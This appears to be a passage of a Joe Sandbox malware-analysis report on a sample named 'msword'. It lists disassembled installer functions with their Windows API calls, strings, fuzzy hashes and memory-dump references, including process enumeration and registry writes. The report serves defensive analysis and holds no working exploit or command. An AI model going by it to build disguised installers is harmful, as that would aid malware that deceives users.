                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                        • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                        • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                        • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                        Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                        • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                        • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                          • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                        • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                        • API String ID: 20674999-2124804629
                                                                        • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                        • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                        • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                        • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                        Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                        • GetSysColor.USER32(?), ref: 004041AF
                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                        • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                          • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                          • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                        • SendMessageW.USER32(00000000), ref: 00404251
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                        • SetCursor.USER32(00000000), ref: 004042D2
                                                                        • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                        • SetCursor.USER32(00000000), ref: 004042F6
                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                        • String ID: @%F$N$open
                                                                        • API String ID: 3928313111-3849437375
                                                                        • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                        • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                        • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                        • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                        Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                        • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                        • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                        • wsprintfA.USER32 ref: 00406B4D
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                        • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                        • String ID: F$%s=%s$NUL$[Rename]
                                                                        • API String ID: 565278875-1653569448
                                                                        • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                        • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                        • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                        • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                        • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: F
                                                                        • API String ID: 941294808-1304234792
                                                                        • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                        • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                        • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                        • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                        Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                        • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                        • API String ID: 1641139501-220328614
                                                                        • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                        • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                        • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                        • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                        Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                        Strings
                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                        • String ID: created uninstaller: %d, "%s"
                                                                        • API String ID: 3294113728-3145124454
                                                                        • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                        • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                        • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                        • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                        Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                        • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                        • API String ID: 3734993849-2769509956
                                                                        • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                        • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                        • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                        • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                        Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                        • GetSysColor.USER32(00000000), ref: 00403E00
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                        • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                        • GetSysColor.USER32(?), ref: 00403E2B
                                                                        • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                        • DeleteObject.GDI32(?), ref: 00403E55
                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                        • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                        • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                        • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                        Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                        Strings
                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                        • API String ID: 1033533793-945480824
                                                                        • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                        • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                        • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                        • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                        Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
